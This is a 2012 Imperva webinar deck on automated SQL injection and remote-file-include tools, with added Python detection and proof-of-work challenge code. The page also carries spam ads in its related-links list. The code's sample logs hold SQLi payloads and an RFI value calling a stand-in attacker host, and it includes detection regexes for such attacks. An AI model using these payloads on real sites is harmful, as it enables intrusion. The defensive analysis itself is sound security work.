Automated Hacking Tools:
The New Rock Stars in the Cyber Underground




              © 2012 Imperva, Inc. All rights reserved.
Agenda

  Context for HII Reports
  Introducing Automated Hacking
     + Quantifying Automation
     + Hacking Automation Use Cases
     + Sample Tools
  Analyzing Real World Data
  Detection and Mitigation
  Questions and Answers




Presenter:
  Amichai Shulman – CTO Imperva

   Speaker at Industry Events
    + RSA, Sybase Techwave, Info Security UK, Black Hat
   Lecturer on Info Security
    + Technion - Israel Institute of Technology
   Former Security Consultant to Banks and
    Financial Services Firms
   Leads the Application Defense Center (ADC)
    + Discovered over 20 commercial application
      vulnerabilities
       – Credited by Oracle, MS-SQL, IBM and others



         Amichai Shulman, one of InfoWorld’s “Top 25 CTOs”
HII Report Context

  Hacker Intelligence Initiative is focused on
   understanding how attackers are operating in
   practice
      + A different approach from vulnerability research
  Data set composition
      + ~50 real world applications
      + Anonymous Proxies
  More than 18 months of data
  Powerful analysis system
      + Combines analytic tools with drill down capabilities




Introducing Automated Hacking




Quantifying Automation


   [Pie charts] RFI: Manual 2%, Automatic 98%. SQLi: Manual 12%, Automatic 88%.




Hacking Automation Use Cases

   Automation affects the magnitude of the threat posed by
    hacking




 Honeypot.org: The Social Dynamics of Hacking

Hacking Automation Use Cases

   Skilled Hackers
     + Create more powerful tools
     + Focus not only on finding vulnerabilities but also on robust
       automation of their exploit (an engineering challenge)
   Professional Hackers (Semi-skilled)
     + Can increase their business faster and more effectively using
       automation
     + Puts more organizations at risk as potential targets
   Unskilled Hackers
     + Increased potential of incidental damages




Hacking Automation Use Cases

   Botnets
      + A step further in the evolution of automated hacking
      + Rather than automating a task it is automation of the entire
        operation
   Includes all steps of the operation
      + Target selection
      + Probing
      + Exploit




Automated Hacking Tools

   Search engine hacking
      + Discovery phase
      + Mostly botnet based today
   General scanners
      + Probing of chosen targets
   Focused on attack type
   Focused on individual vulnerability
      + Exist as standalone tools and botnet modules




Automated Hacking Tools


   High-end
      + Slick GUI (point and click)
      + Evasion techniques
      + State of the art attack vectors
   Havij
      + Focused on SQL Injection attacks
      + Used in attacks by Lulzsec and Anonymous




Automated Hacking Tools


   Professional
      + Command line
      + Ready for instrumentation
   SQLmap
      + Focused on SQL Injection
   FIMAP
      + Focused on Remote File Include




Automated Hacking Tools


   WhiteHat flipping sides
      + Tools aimed at vulnerability scanning
      + Automation is essential for continuous testing of
        large and complex web applications
      + Inherently easier to operate
   Nikto
      + Public domain, low end
   Nessus
      + Public domain (some versions), very friendly GUI
   Acunetix
      + Powerful commercial tool, stolen licenses are
        shared among hackers


Analyzing Real World Data




Type of Automation

   The type of automation is tightly related to the nature of
    the vulnerability to be exploited
   SQL Injection
     + Tools that focus on an individual application at a time
     + High volume, high rate traffic generated against a single
        application
   RFI
     + Tools that try to cover as many applications as possible
     + Low volume traffic when watching a single application
   Search Engine Hacking
     + Need to bypass search engine restrictions
     + Highly distributed botnets


Type of Automation

   RFI Attacks
   Many sources attack more than one target




Persistence of Sources

   A fair amount of attack sources are persistent over time
      + Persistent source = more than 3 days of activity
      + 30% of SQLi attacks
      + 60% of RFI attacks

   [Chart: SQLi attacks (log scale, 1 to 10000) by activity days (0 to 100)]




Persistence of Sources

   RFI Attacks
   Many consistent attackers




Persistence of Attack Vectors

   RFI Attacks
   Collect URLs that host infection script
   Some URLs are being used consistently over time




Persistence of Attack Vectors

   Many shell URLs are used against more than one target




Country of Origin

   Most attack sources are in the US
   Most high rate automation sources are in China!
        SQLi                                          SQLi
        Country              Hosts   % of Hosts       Country              Hosts   % of Hosts
        USA                   3994       80           China                   98       30
        China                  355        7           USA                     78       24
        United Kingdom          75        2           Netherlands              9        3
        Russian Federation      49        1           Morocco                  8        2
        Canada                  40        1           Egypt                    7        2
        Republic of Korea       33        1           Luxembourg               7        2
        Germany                 31        1           Brazil                   7        2
        Brazil                  29        1           France                   7        2
        India                   28        1           Indonesia                6        2
        France                  24        1           Russian Federation       6        2




Detection and Mitigation




General

   Motivation
     + Automated hacking accounts for a large portion of attack traffic
     + Being able to detect malicious automation dramatically reduces
       the stress on other mechanisms designed to detect specific
       attacks
   Challenge
     + Hard to implement WITHIN applications as automation can be
       applied against each and every part of the application or the
       underlying application server




Detecting Automated Hacking - Passive

   Passive Methods
      + Watch network traffic “as-is”
      + Non-intrusive, do not affect user experience
   Traffic Shape Indicators
      + We measure suspicious requests (rather than ALL requests)
      + Measured attributes
          – Rate
          – Rate change (ramp-up speed)
          – Volume
      + Difficult to measure in an inherently noisy source (NAT)
   Request Shape Indicators
      + Missing headers
      + Mismatch between headers and location
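The passive indicators above, as an added example (not Imperva's code): it parses constructed access-log lines in an assumed format, measures rate, ramp-up and volume of suspicious requests per source, and counts missing headers and Referer/host mismatches. The SQLi/RFI signatures, log format and thresholds are assumptions for illustration.

```python
import re
from collections import defaultdict
from datetime import datetime, timedelta
from urllib.parse import urlsplit

# Assumed log format, one request per line (constructed for this example):
# <ISO timestamp> <client ip> <host> <method> <path> <referer|-> "<user-agent|->"
LOG_RE = re.compile(
    r'^(?P<ts>\S+) (?P<ip>\S+) (?P<host>\S+) (?P<method>\S+) (?P<path>\S+) '
    r'(?P<referer>\S+) "(?P<ua>[^"]*)"$'
)

# Illustrative signatures for the two attack classes the deck analyses.
# Real deployments use a much richer rule set; these only pick the
# "suspicious" subset that the traffic-shape metrics are computed over.
SUSPICIOUS = [
    ("sqli", re.compile(r"(union(\s|\+|%20)+select|%27|'\s*or\s+1=1|sleep\()", re.I)),
    ("rfi", re.compile(r"=(https?|ftp)(://|%3a%2f%2f)", re.I)),
]
BUCKET = 10  # seconds; rate and ramp-up are measured per bucket


def parse(line):
    m = LOG_RE.match(line)
    if not m:
        return None
    rec = m.groupdict()
    rec["ts"] = datetime.fromisoformat(rec["ts"])
    rec["referer"] = None if rec["referer"] == "-" else rec["referer"]
    rec["ua"] = None if rec["ua"] == "-" else rec["ua"]
    return rec


def classify(path):
    """Return the attack class a request path matches, or None."""
    for name, rx in SUSPICIOUS:
        if rx.search(path):
            return name
    return None


def source_profiles(lines):
    """Traffic-shape and request-shape indicators per source IP, computed
    over suspicious requests only, as the slide recommends."""
    per_src = defaultdict(list)
    for line in lines:
        rec = parse(line)
        if rec and classify(rec["path"]):
            per_src[rec["ip"]].append(rec)
    profiles = {}
    for ip, recs in per_src.items():
        recs.sort(key=lambda r: r["ts"])
        t0 = recs[0]["ts"]
        buckets = defaultdict(int)
        for r in recs:
            buckets[int((r["ts"] - t0).total_seconds()) // BUCKET] += 1
        counts = [0] + [buckets[i] for i in range(max(buckets) + 1)]
        profiles[ip] = {
            "volume": len(recs),
            # Rate: busiest bucket, in suspicious requests per second
            "peak_rate": max(counts) / BUCKET,
            # Rate change: largest jump between consecutive buckets (ramp-up)
            "ramp_up": max(counts[i] - counts[i - 1] for i in range(1, len(counts))),
            # Request shape: headers a browser always sends but tools often omit
            "missing_headers": sum(1 for r in recs if r["ua"] is None or r["referer"] is None),
            # Referer names a page on a different host than the one requested
            "referer_mismatch": sum(1 for r in recs if r["referer"]
                                    and urlsplit(r["referer"]).hostname != r["host"]),
        }
    return profiles


def is_automated(p, min_volume=20, min_rate=1.0, shape_ratio=0.5):
    """Heuristic verdict. Thresholds are assumptions to tune per site; a NAT
    gateway makes one IP look like many users, so traffic shape alone is
    noisy and request-shape evidence is only trusted with some volume."""
    traffic = p["volume"] >= min_volume and p["peak_rate"] >= min_rate
    shape = (p["missing_headers"] + p["referer_mismatch"]) / p["volume"] >= shape_ratio
    return traffic or (shape and p["volume"] >= 5)


def constructed_log():
    """Constructed sample: a SQLi tool hammering one application, one RFI
    probe (low volume per application, as the deck notes) and a real user."""
    base = datetime(2012, 5, 1, 10, 0, 0)
    lines = []
    for i in range(30):  # 30 probes in 30 s, no User-Agent, no Referer
        ts = (base + timedelta(seconds=i)).isoformat()
        lines.append(f'{ts} 203.0.113.9 shop.example GET /item?id={i}%27+union+select+1,2 - "-"')
    ts = (base + timedelta(seconds=40)).isoformat()
    lines.append(f'{ts} 192.0.2.55 shop.example GET /index.php?page=http://attacker.invalid/s.txt '
                 f'http://other.invalid/ "curl/7.2"')
    ts = (base + timedelta(seconds=50)).isoformat()
    lines.append(f'{ts} 198.51.100.7 shop.example GET /search?q=o%27brien https://shop.example/ "Mozilla/5.0"')
    return lines


if __name__ == "__main__":
    for ip, p in source_profiles(constructed_log()).items():
        print(ip, p, "AUTOMATED" if is_automated(p) else "ok")
```

The single RFI probe is not flagged by traffic shape at all, which is the deck's point that RFI tools spread low volume across many applications and are better caught with shared reputation data.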



Detecting Automated Hacking - Active

   Introduce changes into the server response
      + Test client’s reaction to changes
      + May affect user experience – use with care
      + Verify type of user agent
   Browsers support Javascript and an appropriate DOM
      + Client is expected to complete some computation
      + Application / GW can validate the computed value
   Browsers comply with HTML tags (IMG, IFRAME)
      + Client is expected to access resource referenced by embedded
        tags
      + Failure to access the resources implies that client is an
        automated script


Mitigation - Wisdom of the Crowds

   Detected automation feeds into building fingerprints of
    tools and reputation data for sources
   Leveraged when data is collected within a community
   Recent regulatory changes endorse the concept of
    community
   Drop requests matching fingerprints or coming from ill-
    reputed sources




Mitigation – Challenges and Metering

   Introduce changes to the response that
    require a true browser user-agent before
    letting any further requests within a
    session
      + Application / GW keeps sending the test for any
        request not in a validated session
      + A session is validated only if user-agent
        responds properly
   Introduce changes to the response that
    (based on the previous enforcement)
    introduce client side latency
      + Challenge the client to solve a mathematical
        riddle
      + Partial hash collisions are a good example
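The browser computation check from the "Active" slide and the challenge-and-metering scheme above, as one added example (not Imperva's code): a gateway that keeps challenging every request in an unvalidated session, validates the session only when the client returns a correct answer, and uses a partial SHA-256 collision whose difficulty grows with the source's suspicion level. The HMAC binding, TTL and difficulty constants are assumptions.

```python
import hashlib
import hmac
import os
import time

SECRET = os.urandom(32)   # gateway-side key (assumption: rotated in production)
CHALLENGE_TTL = 60        # seconds a challenge stays answerable
BASE_BITS = 12            # ~4k hashes for an ordinary client
PENALTY_BITS = 4          # extra difficulty per suspicion level (assumption)


def _tag(session_id, challenge, expires, bits):
    """HMAC over everything the client could tamper with."""
    msg = f"{session_id}|{challenge}|{expires}|{bits}".encode()
    return hmac.new(SECRET, msg, hashlib.sha256).hexdigest()


def issue_challenge(session_id, suspicion=0, now=None):
    """Stateless challenge: the tag binds it to the session, its expiry and
    its difficulty, so the gateway need not remember what it handed out."""
    now = time.time() if now is None else now
    challenge = os.urandom(16).hex()
    expires = int(now) + CHALLENGE_TTL
    bits = BASE_BITS + PENALTY_BITS * suspicion
    return {"challenge": challenge, "expires": expires, "bits": bits,
            "tag": _tag(session_id, challenge, expires, bits)}


def leading_zero_bits(digest):
    return 256 - int.from_bytes(digest, "big").bit_length()


def solve(ch):
    """Reference client solver (what the JavaScript served to a browser would
    do): brute-force a nonce until the partial collision condition holds.
    Expected cost is about 2**bits hashes, which is the client-side latency."""
    nonce = 0
    while True:
        digest = hashlib.sha256(f"{ch['challenge']}:{nonce}".encode()).digest()
        if leading_zero_bits(digest) >= ch["bits"]:
            return nonce
        nonce += 1


def verify(session_id, ch, nonce, now=None):
    """Gateway-side check: one HMAC and one SHA-256, whatever the difficulty."""
    now = time.time() if now is None else now
    expected = _tag(session_id, ch["challenge"], ch["expires"], ch["bits"])
    if not hmac.compare_digest(expected, ch.get("tag", "")):
        return False  # forged or tampered challenge (e.g. lowered bits)
    if now > ch["expires"]:
        return False  # replay of an old solution
    digest = hashlib.sha256(f"{ch['challenge']}:{nonce}".encode()).digest()
    return leading_zero_bits(digest) >= ch["bits"]


class Gateway:
    """Every request in an unvalidated session gets the challenge; only a
    correct answer validates the session and lets traffic through."""

    def __init__(self):
        self.validated = set()

    def handle(self, session_id, answer=None, suspicion=0, now=None):
        if session_id in self.validated:
            return ("pass", None)
        if answer and verify(session_id, answer["challenge"], answer["nonce"], now):
            self.validated.add(session_id)
            return ("pass", None)
        return ("challenge", issue_challenge(session_id, suspicion, now))


if __name__ == "__main__":
    gw = Gateway()
    kind, ch = gw.handle("session-1")
    nonce = solve(ch)  # a real browser does this in JavaScript
    print(kind, gw.handle("session-1", answer={"challenge": ch, "nonce": nonce}))
```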


Mitigation (cont.)

   Introduce CAPTCHA or other test to tell apart a human
    operator from a script




Summary

  Automation is ruling the threat landscape
      + It accounts for the lion's share of attack traffic

  Automation is used in various forms
      + In depth scanning / attack of a single target
      + Wide breadth scanning / attack of multiple applications
      + Distributed scanning / attack of single / multiple applications




Summary (cont.)


   Detection and mitigation are essential for reducing noise
    and focusing resources on the most complex attacks
   Detection and mitigation are most effectively deployed
    outside of the application
   Detection and mitigation must include a combination of
    passive and active measures
   Detection and mitigation are best utilized within a
    community that can generate reputation data



Webinar Materials

    Join Our LinkedIn Group, Imperva Data Security Direct for…
      + Answers to Attendee Questions
      + Post-Webinar Discussions
      + Webinar Recording Link
      + Webinar Slides

www.imperva.com





 
Apidays New York 2024 - Accelerating FinTech Innovation by Vasa Krishnan, Fin...
Apidays New York 2024 - Accelerating FinTech Innovation by Vasa Krishnan, Fin...Apidays New York 2024 - Accelerating FinTech Innovation by Vasa Krishnan, Fin...
Apidays New York 2024 - Accelerating FinTech Innovation by Vasa Krishnan, Fin...apidays
 
Emergent Methods: Multi-lingual narrative tracking in the news - real-time ex...
Emergent Methods: Multi-lingual narrative tracking in the news - real-time ex...Emergent Methods: Multi-lingual narrative tracking in the news - real-time ex...
Emergent Methods: Multi-lingual narrative tracking in the news - real-time ex...Zilliz
 
Architecting Cloud Native Applications
Architecting Cloud Native ApplicationsArchitecting Cloud Native Applications
Architecting Cloud Native ApplicationsWSO2
 
Artificial Intelligence Chap.5 : Uncertainty
Artificial Intelligence Chap.5 : UncertaintyArtificial Intelligence Chap.5 : Uncertainty
Artificial Intelligence Chap.5 : UncertaintyKhushali Kathiriya
 
EMPOWERMENT TECHNOLOGY GRADE 11 QUARTER 2 REVIEWER
EMPOWERMENT TECHNOLOGY GRADE 11 QUARTER 2 REVIEWEREMPOWERMENT TECHNOLOGY GRADE 11 QUARTER 2 REVIEWER
EMPOWERMENT TECHNOLOGY GRADE 11 QUARTER 2 REVIEWERMadyBayot
 
Finding Java's Hidden Performance Traps @ DevoxxUK 2024
Finding Java's Hidden Performance Traps @ DevoxxUK 2024Finding Java's Hidden Performance Traps @ DevoxxUK 2024
Finding Java's Hidden Performance Traps @ DevoxxUK 2024Victor Rentea
 
ICT role in 21st century education and its challenges
ICT role in 21st century education and its challengesICT role in 21st century education and its challenges
ICT role in 21st century education and its challengesrafiqahmad00786416
 
AWS Community Day CPH - Three problems of Terraform
AWS Community Day CPH - Three problems of TerraformAWS Community Day CPH - Three problems of Terraform
AWS Community Day CPH - Three problems of TerraformAndrey Devyatkin
 

Último (20)

Modular Monolith - a Practical Alternative to Microservices @ Devoxx UK 2024
Modular Monolith - a Practical Alternative to Microservices @ Devoxx UK 2024Modular Monolith - a Practical Alternative to Microservices @ Devoxx UK 2024
Modular Monolith - a Practical Alternative to Microservices @ Devoxx UK 2024
 
Biography Of Angeliki Cooney | Senior Vice President Life Sciences | Albany, ...
Biography Of Angeliki Cooney | Senior Vice President Life Sciences | Albany, ...Biography Of Angeliki Cooney | Senior Vice President Life Sciences | Albany, ...
Biography Of Angeliki Cooney | Senior Vice President Life Sciences | Albany, ...
 
WSO2's API Vision: Unifying Control, Empowering Developers
WSO2's API Vision: Unifying Control, Empowering DevelopersWSO2's API Vision: Unifying Control, Empowering Developers
WSO2's API Vision: Unifying Control, Empowering Developers
 
Apidays New York 2024 - The Good, the Bad and the Governed by David O'Neill, ...
Apidays New York 2024 - The Good, the Bad and the Governed by David O'Neill, ...Apidays New York 2024 - The Good, the Bad and the Governed by David O'Neill, ...
Apidays New York 2024 - The Good, the Bad and the Governed by David O'Neill, ...
 
TrustArc Webinar - Unlock the Power of AI-Driven Data Discovery
TrustArc Webinar - Unlock the Power of AI-Driven Data DiscoveryTrustArc Webinar - Unlock the Power of AI-Driven Data Discovery
TrustArc Webinar - Unlock the Power of AI-Driven Data Discovery
 
Understanding the FAA Part 107 License ..
Understanding the FAA Part 107 License ..Understanding the FAA Part 107 License ..
Understanding the FAA Part 107 License ..
 
presentation ICT roal in 21st century education
presentation ICT roal in 21st century educationpresentation ICT roal in 21st century education
presentation ICT roal in 21st century education
 
Mcleodganj Call Girls 🥰 8617370543 Service Offer VIP Hot Model
Mcleodganj Call Girls 🥰 8617370543 Service Offer VIP Hot ModelMcleodganj Call Girls 🥰 8617370543 Service Offer VIP Hot Model
Mcleodganj Call Girls 🥰 8617370543 Service Offer VIP Hot Model
 
Strategize a Smooth Tenant-to-tenant Migration and Copilot Takeoff
Strategize a Smooth Tenant-to-tenant Migration and Copilot TakeoffStrategize a Smooth Tenant-to-tenant Migration and Copilot Takeoff
Strategize a Smooth Tenant-to-tenant Migration and Copilot Takeoff
 
Polkadot JAM Slides - Token2049 - By Dr. Gavin Wood
Polkadot JAM Slides - Token2049 - By Dr. Gavin WoodPolkadot JAM Slides - Token2049 - By Dr. Gavin Wood
Polkadot JAM Slides - Token2049 - By Dr. Gavin Wood
 
DBX First Quarter 2024 Investor Presentation
DBX First Quarter 2024 Investor PresentationDBX First Quarter 2024 Investor Presentation
DBX First Quarter 2024 Investor Presentation
 
Apidays New York 2024 - Accelerating FinTech Innovation by Vasa Krishnan, Fin...
Apidays New York 2024 - Accelerating FinTech Innovation by Vasa Krishnan, Fin...Apidays New York 2024 - Accelerating FinTech Innovation by Vasa Krishnan, Fin...
Apidays New York 2024 - Accelerating FinTech Innovation by Vasa Krishnan, Fin...
 
Emergent Methods: Multi-lingual narrative tracking in the news - real-time ex...
Emergent Methods: Multi-lingual narrative tracking in the news - real-time ex...Emergent Methods: Multi-lingual narrative tracking in the news - real-time ex...
Emergent Methods: Multi-lingual narrative tracking in the news - real-time ex...
 
Architecting Cloud Native Applications
Architecting Cloud Native ApplicationsArchitecting Cloud Native Applications
Architecting Cloud Native Applications
 
Artificial Intelligence Chap.5 : Uncertainty
Artificial Intelligence Chap.5 : UncertaintyArtificial Intelligence Chap.5 : Uncertainty
Artificial Intelligence Chap.5 : Uncertainty
 
EMPOWERMENT TECHNOLOGY GRADE 11 QUARTER 2 REVIEWER
EMPOWERMENT TECHNOLOGY GRADE 11 QUARTER 2 REVIEWEREMPOWERMENT TECHNOLOGY GRADE 11 QUARTER 2 REVIEWER
EMPOWERMENT TECHNOLOGY GRADE 11 QUARTER 2 REVIEWER
 
Finding Java's Hidden Performance Traps @ DevoxxUK 2024
Finding Java's Hidden Performance Traps @ DevoxxUK 2024Finding Java's Hidden Performance Traps @ DevoxxUK 2024
Finding Java's Hidden Performance Traps @ DevoxxUK 2024
 
ICT role in 21st century education and its challenges
ICT role in 21st century education and its challengesICT role in 21st century education and its challenges
ICT role in 21st century education and its challenges
 
AWS Community Day CPH - Three problems of Terraform
AWS Community Day CPH - Three problems of TerraformAWS Community Day CPH - Three problems of Terraform
AWS Community Day CPH - Three problems of Terraform
 
+971581248768>> SAFE AND ORIGINAL ABORTION PILLS FOR SALE IN DUBAI AND ABUDHA...
+971581248768>> SAFE AND ORIGINAL ABORTION PILLS FOR SALE IN DUBAI AND ABUDHA...+971581248768>> SAFE AND ORIGINAL ABORTION PILLS FOR SALE IN DUBAI AND ABUDHA...
+971581248768>> SAFE AND ORIGINAL ABORTION PILLS FOR SALE IN DUBAI AND ABUDHA...
 

Automated Hacking Tools - Meet the New Rock Stars in the Cyber Underground

  • 1. Automated Hacking Tools: The New Rock Stars in the Cyber Underground © 2012 Imperva, Inc. All rights reserved.
  • 2. Agenda
     Context for HII Reports
     Introducing Automated Hacking
      + Quantifying Automation
      + Hacking Automation Use Cases
      + Sample Tools
     Analyzing Real World Data
     Detection and Mitigation
     Questions and Answers
  • 3. Presenter: Amichai Shulman – CTO Imperva
     Speaker at Industry Events
      + RSA, Sybase Techwave, Info Security UK, Black Hat
     Lecturer on Info Security
      + Technion - Israel Institute of Technology
     Former Security Consultant to Banks and Financial Services Firms
     Leads the Application Defense Center (ADC)
      + Discovered over 20 commercial application vulnerabilities
        – Credited by Oracle, MS-SQL, IBM and others
    Amichai Shulman one of InfoWorld’s “Top 25 CTOs”
  • 4. HII Report Context
     Hacker Intelligence Initiative is focused on understanding how attackers are operating in practice
      + A different approach from vulnerability research
     Data set composition
      + ~50 real world applications
      + Anonymous Proxies
     More than 18 months of data
     Powerful analysis system
      + Combines analytic tools with drill down capabilities
  • 5. Introducing Automated Hacking
  • 6. Quantifying Automation
  • 7. Quantifying Automation
     RFI: Automatic 98%, Manual 2%
     SQLi: Automatic 88%, Manual 12%
  • 8. Hacking Automation Use Cases
     Automation affects the magnitude of the threat posed by hacking
    Honeypot.org: The Social Dynamics of Hacking
  • 9. Hacking Automation Use Cases
     Skilled Hackers
      + Create more powerful tools
      + Focus not only on finding vulnerabilities but also on robust automation of their exploit (an engineering challenge)
     Professional Hackers (Semi-skilled)
      + Can increase their business faster and more effectively using automation
      + Puts more organizations at risk as potential targets
     Unskilled Hackers
      + Increased potential of incidental damages
  • 10. Hacking Automation Use Cases
     Botnets
      + A step further in the evolution of automated hacking
      + Rather than automating a task it is automation of the entire operation
     Includes all steps of the operation
      + Target selection
      + Probing
      + Exploit
  • 11. Automated Hacking Tools
     Search engine hacking
      + Discovery phase
      + Mostly botnet based today
     General scanners
      + Probing of chosen targets
        – Focused on attack type
        – Focused on individual vulnerability
      + Exist as standalone tools and botnet modules
  • 12. Automated Hacking Tools
     High-end
      + Slick GUI (point and click)
      + Evasion techniques
      + State of the art attack vectors
     Havij
      + Focused on SQL Injection attacks
      + Used in attacks by Lulzsec and Anonymous
  • 13. Automated Hacking Tools
  • 14. Automated Hacking Tools
     Professional
      + Command line
      + Ready for instrumentation
     SQLmap
      + Focused on SQL Injection
     FIMAP
      + Focused on Remote File Include
  • 15. Automated Hacking Tools
  • 16. Automated Hacking Tools
     WhiteHat flipping sides
      + Tools aimed at vulnerability scanning
      + Automation is essential for continuous testing of large and complex web applications
      + Inherently easier to operate
     Nikto
      + Public domain, low end
     Nessus
      + Public domain (some versions), very friendly GUI
     Acunetix
      + Powerful commercial tool, stolen licenses are shared among hackers
  • 17. Analyzing Real World Data
  • 18. Type of Automation
     The type of automation is tightly related to the nature of the vulnerability to be exploited
     SQL Injection
      + Tools that focus on an individual application at a time
      + High volume, high rate traffic generated against a single application
     RFI
      + Tools that try to cover as many applications as possible
      + Low volume traffic when watching a single application
     Search Engine Hacking
      + Need to bypass search engine restrictions
      + Highly distributed botnets
  • 19. Type of Automation
  • 20. Type of Automation
     RFI Attacks
     Many sources attack more than one target
  • 21. Persistence of Sources
     A fair amount of attack sources are persistent over time
      + Persistent source = more than 3 days of activity
      + 30% of SQLi attacks
      + 60% of RFI attacks
    [Chart: SQLi Attacks (log scale, 1 to 10000) against Activity Days (0 to 100)]
  • 22. Persistence of Sources
     RFI Attacks
     Many consistent attackers
  • 23. Persistence of Attack Vectors
     RFI Attacks
     Collect URLs that host infection script
     Some URLs are being used consistently over time
  • 24. Persistence of Attack Vectors
     Many shell URLs are used against more than one target
  • 25. Country of Origin
     Most attack sources are in the US
     Most high rate automation sources are in China!

    SQLi, all attack sources                   SQLi, high rate automation sources
    Country              Hosts   % of Hosts    Country              Hosts   % of Hosts
    USA                   3994       80        China                   98       30
    China                  355        7        USA                     78       24
    United Kingdom          75        2        Netherlands              9        3
    Russian Federation      49        1        Morocco                  8        2
    Canada                  40        1        Egypt                    7        2
    Republic of Korea       33        1        Luxemburg                7        2
    Germany                 31        1        Brazil                   7        2
    Brazil                  29        1        France                   7        2
    India                   28        1        Indonesia                6        2
    France                  24        1        Russian Federation       6        2
  • 26. Detection and Mitigation
  • 27. General
     Motivation
      + Automated hacking accounts for a large portion of attack traffic
      + Being able to detect malicious automation dramatically reduces the stress on other mechanisms designed to detect specific attacks
     Challenge
      + Hard to implement WITHIN applications as automation can be applied against each and every part of the application or the underlying application server
  • 28. Detecting Automated Hacking - Passive
     Passive Methods
      + Watch network traffic “as-is”
      + Non intrusive, do not affect user experience
     Traffic Shape Indicators
      + We measure suspicious requests (rather than ALL requests)
      + Measured attributes
        – Rate
        – Rate change (ramp-up speed)
        – Volume
      + Difficult to measure in an inherently noisy source (NAT)
     Request Shape Indicators
      + Missing headers
      + Mismatch between headers and location
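The passive indicators on slide 28 (rate, ramp-up speed, volume, missing headers, and the NAT caveat), worked through as an added Python example. This is not code from the deck or from any Imperva product: the request log, the expected-header list, the thresholds, and the "many distinct User-Agents behind one address means NAT" heuristic are all constructed assumptions for illustration. It only looks at requests an earlier stage already flagged as suspicious, as the slide prescribes.

```python
from collections import defaultdict

# Constructed sample of requests that an earlier stage already flagged as
# suspicious (e.g. they carried an SQLi or RFI pattern). Tuples are
# (epoch second, source IP, request headers). Invented data, not captured traffic.
SUSPICIOUS_REQUESTS = (
    # 10.0.0.5: one script driving a single application, bare header set
    [(t, "10.0.0.5", {"User-Agent": "python-requests/2.31"}) for t in range(0, 4)]
    + [(t, "10.0.0.5", {"User-Agent": "python-requests/2.31"}) for t in range(10, 40)]
    # 10.0.0.9: two isolated probes with browser-like headers
    + [(t, "10.0.0.9", {"User-Agent": "Mozilla/5.0", "Accept": "text/html",
                        "Accept-Language": "en-US"}) for t in (3, 25)]
    # 10.0.0.20: many requests, but from five different browsers (a NAT gateway)
    + [(t, "10.0.0.20", {"User-Agent": f"Mozilla/5.0 (client {t % 5})",
                         "Accept": "text/html", "Accept-Language": "de-DE"})
       for t in range(40, 65)]
)

EXPECTED_HEADERS = ("User-Agent", "Accept", "Accept-Language")
WINDOW_SECONDS = 10
# Thresholds are illustrative; tune them per application from observed baselines.
THRESHOLDS = {"volume": 20, "peak_rate": 0.5, "ramp": 5, "missing_headers_avg": 1.0}
NAT_AGENT_THRESHOLD = 3  # distinct User-Agents per address before we suspect NAT


def missing_headers(headers):
    """Request-shape indicator: headers a real browser would normally send."""
    return [h for h in EXPECTED_HEADERS if h not in headers]


def source_indicators(requests, window=WINDOW_SECONDS):
    """Traffic-shape indicators per source: volume, peak rate, ramp-up, header shape."""
    counts = defaultdict(lambda: defaultdict(int))   # ip -> window index -> count
    missing = defaultdict(int)                       # ip -> total missing headers
    agents = defaultdict(set)                        # ip -> distinct User-Agents
    for ts, ip, headers in requests:
        counts[ip][ts // window] += 1
        missing[ip] += len(missing_headers(headers))
        agents[ip].add(headers.get("User-Agent", ""))
    result = {}
    for ip, buckets in counts.items():
        first, last = min(buckets), max(buckets)
        # Per-window counts, starting from 0 before the first window so that a
        # source that opens at full speed shows a large ramp-up.
        series = [0] + [buckets.get(i, 0) for i in range(first, last + 1)]
        volume = sum(series)
        result[ip] = {
            "volume": volume,
            "peak_rate": max(series) / window,                  # requests per second
            "ramp": max(b - a for a, b in zip(series, series[1:])),
            "missing_headers_avg": missing[ip] / volume,
            "distinct_agents": len(agents[ip]),
        }
    return result


def classify(ind):
    """Combine traffic-shape and request-shape evidence into a verdict."""
    traffic = [k for k in ("volume", "peak_rate", "ramp") if ind[k] >= THRESHOLDS[k]]
    shape = ind["missing_headers_avg"] >= THRESHOLDS["missing_headers_avg"]
    if ind["distinct_agents"] >= NAT_AGENT_THRESHOLD:
        # Many User-Agents behind one address: probably NAT or a proxy, where
        # rate alone is noisy. Require request-shape evidence as well.
        if traffic and shape:
            return "automated"
        return "inconclusive" if traffic else "benign"
    return "automated" if len(traffic) + int(shape) >= 2 else "benign"


def verdicts(requests=SUSPICIOUS_REQUESTS):
    return {ip: classify(ind) for ip, ind in source_indicators(requests).items()}


if __name__ == "__main__":
    for ip, ind in source_indicators(SUSPICIOUS_REQUESTS).items():
        print(ip, classify(ind), ind)
```

On the constructed sample, 10.0.0.5 trips every indicator and is classified as automated, 10.0.0.9 is benign, and 10.0.0.20 is high-volume but shows five distinct browsers and full header sets, so it lands as inconclusive rather than being blocked on rate alone; that is the NAT noise the slide warns about, handled by demanding a second kind of evidence.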
  • 29. Detecting Automated Hacking - Passive
  • 30. Detecting Automated Hacking - Active
     Introduce changes into the server response
      + Test client’s reaction to changes
      + May affect user experience – use with care
      + Verify type of user agent
     Browsers support Javascript and an appropriate DOM
      + Client is expected to complete some computation
      + Application / GW can validate the computed value
     Browsers comply with HTML tags (IMG, IFRAME)
      + Client is expected to access resource referenced by embedded tags
      + Failure to access the resources implies that client is an automated script
  • 31. Mitigation - Wisdom of the Crowds
     Detected automation feeds into building fingerprints of tools and reputation data for sources
     Leveraged when data is collected within a community
     Recent regulatory changes endorse the concept of community
     Drop requests matching fingerprints or coming from ill reputed sources
  • 32. Mitigation – Challenges and Metering
     Introduce changes to the response that require a true browser user-agent before letting any further requests within a session
      + Application / GW keeps sending the test for any request not in a validated session
      + A session is validated only if user-agent responds properly
     Introduce changes to the response that (based on the previous enforcement) introduce client side latency
      + Challenge the client to solve a mathematical riddle
      + Partial hash collisions are a good example
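Slides 30 and 32 describe validating a session through a client-side computation and then metering clients with a partial hash collision. The following Python example is added here and is not the deck's or Imperva's code: a toy gateway issues a random nonce, keeps answering every request in an unvalidated session with the challenge, and validates the session only once the client returns a counter whose SHA-256 digest over nonce and counter starts with the required number of zero bits. The class and function names, the 16-bit difficulty, and the in-memory session handling are assumptions made for the example.

```python
import hashlib
import os
from typing import Optional


def leading_zero_bits(digest: bytes) -> int:
    """Number of leading zero bits in a hash digest."""
    bits = 0
    for byte in digest:
        if byte == 0:
            bits += 8
            continue
        bits += 8 - byte.bit_length()
        break
    return bits


def pow_digest(nonce: bytes, counter: int) -> bytes:
    return hashlib.sha256(nonce + counter.to_bytes(8, "big")).digest()


def solve(nonce: bytes, bits: int) -> int:
    """Client side: brute-force the smallest counter whose digest has `bits`
    leading zero bits. Expected work is about 2**bits hashes, which is the
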